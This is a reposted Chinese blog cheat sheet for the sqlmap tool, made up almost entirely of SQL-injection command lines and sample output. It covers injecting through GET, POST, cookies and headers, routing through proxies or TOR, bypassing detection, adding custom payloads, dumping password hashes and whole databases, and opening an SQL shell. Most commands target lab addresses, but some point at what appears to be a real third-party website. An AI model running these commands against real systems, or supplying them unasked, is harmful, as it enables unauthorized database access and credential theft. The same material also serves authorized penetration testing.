注入常用语句

最新推荐文章于 2021-12-22 16:21:59 发布
weixin_30335353
最新推荐文章于 2021-12-22 16:21:59 发布
阅读量74
点赞数
文章标签： php python 数据库
原文链接：http://www.cnblogs.com/crackkay/archive/2013/04/23/3038822.html
版权
  1  $ python sqlmap.py -u "http://ww.victim.com/get_int.php?id=1"--union-use -  
  2         dump -T users -D public -v 0  
  3     <sinp> 
  4     web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)  
  5     web application technology: PHP 5.2.6, Apache 2.2.9  
  6     back-end DBMS: PostgreSQL  
  7     Database: public  
  8     Table: users  
  9     [4 entries]  
 10     +----+------------  +----------+  
 11     | id | password     | username |  
 12     +----+------------  +----------+  
 13     | 1  | blissett     | luther   |  
 14     | 2  | nameisnull   | NULL     |  
 15     | 3  | bunny        | fluffy   |  
 16     | 4  | ming         | wu       |  
 17 
 18 =======================================
 19 
 20 这个东西，是mickey整理的，不多说了，尊重一下原作者，转载注明mickey整理就好了
 21 
 22 更新
 23 svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
 24 
 25 sqlmap.py -u “http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1″ -v 1 –sql-shell //执行SQL语句
 26 
 27 sqlmap.py -u “http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1″ -v 5 //更详细的信息
 28 
 29 load options from a configuration INI file
 30 sqlmap -c sqlmap.conf
 31 
 32 使用POST方法提交
 33 sqlmap.py -u “http://192.168.1.121/sqlmap/oracle/post_int.php” –method POST –data “id=1″
 34 
 35 
 36 使用COOKIES方式提交,cookie的值用;分割,可以使用TamperData来抓cookies
 37 python sqlmap.py -u “http://192.168.1.121/sqlmap/mssql/cookie_int.php” –cookie “id=1″ -v 1
 38 
 39 使用referer欺骗
 40 python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1″ –referer “http://www.google.com” -v 3
 41 
 42 使用自定义user-agent,或者使用随机使用自带的user-agents.txt
 43 python sqlmap.py -u “http://192.168.1.121/sqlmap/oracle/get_int.php?id=1″ –user-agent “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)” -v 3
 44 
 45 python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1″ -v 1 -a “./txt/user-agents.txt”
 46 
 47 使用基本认证
 48 python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/basic/get_int.php?id=1″ –auth-type Basic –auth-cred “testuser:testpass” -v 3
 49 
 50 使用Digest认证
 51 python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/digest/get_int.php?id=1″ –auth-type Digest –auth-cred “testuser:testpass” -v 3
 52 
 53 使用代理,配合TOR
 54 python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1″ –proxy “http://192.168.1.47:3128″
 55 python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1″ –proxy “http://192.168.1.47:8118″
 56 
 57 使用多线程猜解
 58 python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1″ -v 1 –current-user –threads 3
 59 
 60 绕过动态检测,直接指定有注入点的参数,可以使用,分割多个参数,指定user-agent注入
 61 python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1″ -v 1 -p “id
 62 python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&cat=2″ -v 1 -p “cat,id”
 63 python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/ua_str.php” -v 1 -p “user-agent” –user-agent “sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)”
 64 
 65 指定数据库,绕过SQLMAP的自动检测
 66 python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1″ -v 2 –dbms “PostgreSQL”
 67 
 68 * MySQL
 69 * Oracle
 70 * PostgreSQL
 71 * Microsoft SQL Server
 72 
 73 指定操作系统,绕过SQLMAP自动检测
 74 python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1″ -v 2 –os “Windows”
 75 
 76 * Linux
 77 * Windows
 78 
 79 自定义payload
 80 Options: –prefix and –postfix
 81 
 82 In some circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. Another scenario where these options come handy presents itself when the user already knows that query syntax and want to detect and exploit the SQL injection by directly providing a injection payload prefix and/or postfix.
 83 
 84 Example on a MySQL 5.0.67 target on a page where the SQL query is: $query = “SELECT * FROM users WHERE id=(‘” . $_GET['id'] . “‘) LIMIT 0, 1″;:
 85 
 86 $ python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_str_brackets.php?id=1″ -v 3 -p “id” –prefix “‘” –postfix “AND ‘test’='test”
 87 
 88 [...]
 89 [hh:mm:16] [INFO] testing sql injection on GET parameter ‘id’ with 0 parenthesis
 90 [hh:mm:16] [INFO] testing custom injection on GET parameter ‘id’
 91 [hh:mm:16] [TRAFFIC OUT] HTTP request:
 92 GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20
 93 %28%27test%27=%27test HTTP/1.1
 94 Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
 95 Host: 192.168.1.121:80
 96 Accept-language: en-us,en;q=0.5
 97 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
 98 image/png,*/*;q=0.5
 99 User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
100 Connection: close
101 [...]
102 [hh:mm:17] [INFO] GET parameter ‘id’ is custom injectable
103 [...]
104 
105 As you can see, the injection payload for testing for custom injection is:
106 
107 id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test
108 
109 which URL decoded is:
110 
111 id=1′) AND 7433=7433 AND (‘test’='test
112 
113 and makes the query syntatically correct to the page query:
114 
115 SELECT * FROM users WHERE id=(’1′) AND 7433=7433 AND (‘test’='test’) LIMIT 0, 1
116 
117 In this simple example, sqlmap could detect the SQL injection and exploit it without need to provide a custom injection payload, but sometimes in the real world application it is necessary to provide it.
118 
119 页面比较
120 python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1″ –string “luther” -v 1
121 python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1″ –regexp “<td>lu[\w][\w]er” -v
122 
123 排除网站的内容
124 python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1″ –excl-reg “Dynamic content: ([\d]+)”
125 
126 多语句测试，php内嵌函数mysql_query(),不支持多语句
127 python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1″ –stacked-test -v 1
128 
129 union注入测试
130 python sqlmap.py -u “http://192.168.1.121/sqlmap/oracle/get_int.php?id=1″ –union-test -v 1
131 
132 unionz注入配合orderby
133 python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1″ –union-test –union-tech orderby -v 1
134 
135 python sqlmap.py -u “http://192.168.1.121/sqlmap/mssql/get_int.php?id=1″ -v 1 –union-use –banner
136 python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1″ -v 5 –union-use –current-user
137 python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int_partialunion.php?id=1″ -v 1 –union-use –dbs
138 
139 fingerprint
140 python sqlmap.py -u “http://192.168.1.121/sqlmap/mssql/get_int.php?id=1″ -v 1 -f
141 python sqlmap.py -u “http://192.168.123.36/sqlmap/get_str.asp?name=luther” -v 1 -f -b
142 
143 判断当前用户是否是dba
144 python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1″ –is-dba -v 1
145 
146 列举数据库用户
147 python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1″ –users -v 0
148 
149 列举数据库用户密码
150 python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1″ –passwords -v 0
151 python sqlmap.py -u “http://192.168.1.121/sqlmap/mssql/get_int.php?id=1″ –passwords -U sa -v 0
152 
153 查看用户权限
154 python sqlmap.py -u “http://192.168.1.121/sqlmap/oracle/get_int.php?id=1″ –privileges -v 0
155 python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1″ –privileges -U postgres -v 0
156 
157 列数据库
158 python sqlmap.py -u “http://192.168.1.121/sqlmap/mssql/get_int.php?id=1″ –dbs -v 0
159 
160 列出指定数据库指定表的列名
161 python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1″ –columns -T users -D test -v 1
162 
163 列出指定数据库的指定表的指定列的内容
164 python sqlmap.py -u “http://192.168.1.121/sqlmap/mssql/get_int.php?id=1″ –dump -T users -D master -C surname -v 0
165 
166 指定列的范围从2－4
167 python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1″ –dump -T users -D test –start 2 –stop 4 -v 0
168 
169 导出所有数据库，所有表的内容
170 python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1″ –dump-all -v 0
171 
172 只列出用户自己新建的数据库和表的内容
173 python sqlmap.py -u “http://192.168.1.121/sqlmap/mssql/get_int.php?id=1″ –dump-all –exclude-sysdbs -v 0
174 
175 sql query
176 python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1″ –sql-query “SELECT usename FROM pg_user” -v 0
177 python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1″ –sql-query “SELECT host, password FROM mysql.user LIMIT 1, 3″ -v 1
178 
179 SELECT usename, passwd FROM pg_shadow ORDER BY usename
180 
181 保存和恢复会话
182 python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1″ -b -v 1 -s “sqlmap.log”
183 
184 保存选项到INC配置文件
185 python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1″ -b -v 1 –save
186 
187  
188 
189 =====================================================
190 
191 
192 
193 2、sqlmap -g "关键词“ //这是通过google搜索注入，现在还不可以，不知道是什么原因，可以直接修改为百度 
194 3、 
195 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 
196 
197 
198 [hh:mm:25] [INFO] testing if the url is stable, wait a few seconds 
199 [hh:mm:26] [INFO] url is stable 
200 [hh:mm:26] [INFO] testing if GET parameter 'id' is dynamic 
201 [hh:mm:26] [INFO] confirming that GET parameter 'id' is dynamic 
202 [hh:mm:26] [INFO] GET parameter 'id' is dynamic 
203 [hh:mm:26] [INFO] testing sql injection on GET parameter 'id' 
204 [hh:mm:26] [INFO] testing numeric/unescaped injection on GET parameter 
205 'id' 
206 [hh:mm:26] [INFO] confirming numeric/unescaped injection on GET 
207 parameter 'id' 
208 [hh:mm:26] [INFO] GET parameter 'id' is numeric/unescaped injectable 
209 [hh:mm:26] [INFO] testing MySQL 
210 [hh:mm:26] [INFO] query: CONCAT('5', '5') 
211 [hh:mm:26] [INFO] retrieved: 55 
212 [hh:mm:26] [INFO] performed 20 queries in 0 seconds 
213 [hh:mm:26] [INFO] confirming MySQL 
214 [hh:mm:26] [INFO] query: LENGTH('5') 
215 [hh:mm:26] [INFO] retrieved: 1 
216 [hh:mm:26] [INFO] performed 13 queries in 0 seconds 
217 [hh:mm:26] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT 
218 0, 1 
219 [hh:mm:26] [INFO] retrieved: 5 
220 [hh:mm:26] [INFO] performed 13 queries in 0 seconds 
221 remote DBMS: MySQL >= 5.0.0 
222 
223 
224 4、指定参数注入 
225 
226 
227 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 
228 -p "id" 
229 
230 
231 [hh:mm:17] [INFO] testing if the url is stable, wait a few seconds 
232 [hh:mm:18] [INFO] url is stable 
233 [hh:mm:18] [INFO] testing sql injection on parameter 'id' 
234 [hh:mm:18] [INFO] testing numeric/unescaped injection on parameter 
235 'id' 
236 [hh:mm:18] [INFO] confirming numeric/unescaped injection on 
237 parameter 'id' 
238 [hh:mm:18] [INFO] parameter 'id' is numeric/unescaped injectable 
239 [...] 
240 
241 
242 Or if you want to provide more than one parameter, for instance: 
243 
244 
245 $ python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 
246 1 -p "cat,id" 
247 
248 
249 5、指定方法和post的数据 
250 python sqlmap.py -u "http://192.168.1.47/page.php" --method "POST" -- 
251 data "id=1&cat=2" 
252 
253 
254 6、指定cookie,可以注入一些需要登录的地址 
255 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --cookie 
256 "COOKIE_VALUE" 
257 
258 
259 7、通过代理注入 
260 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --proxy 
261 "http://127.0.0.1:8118" 
262 8、指定关键词，也可以不指定。程序会根据返回结果的hash自动判断 
263 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --string 
264 "STRING_ON_TRUE_PAGE" 
265 9、指定数据，这样就不用猜测其他的数据库里。可以提高效率。 
266 --remote-dbms 
267 10、指纹判别数据库类型 
268 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -f 
269 11、获取banner信息 
270 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -b 
271 
272 
273 banner: '5.0.38-Ubuntu_0ubuntu1.1-log'
转载于:https://www.cnblogs.com/crackkay/archive/2013/04/23/3038822.html
weixin_30335353
关注
0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
注入常用语句

1 $ python sqlmap.py -u "http://ww.victim.com/get_int.php?id=1"--union-use - 2 dump -T users -D public -v 0 3 <sinp> 4 web server operating system: Linux Ubunt...
复制链接

扫一扫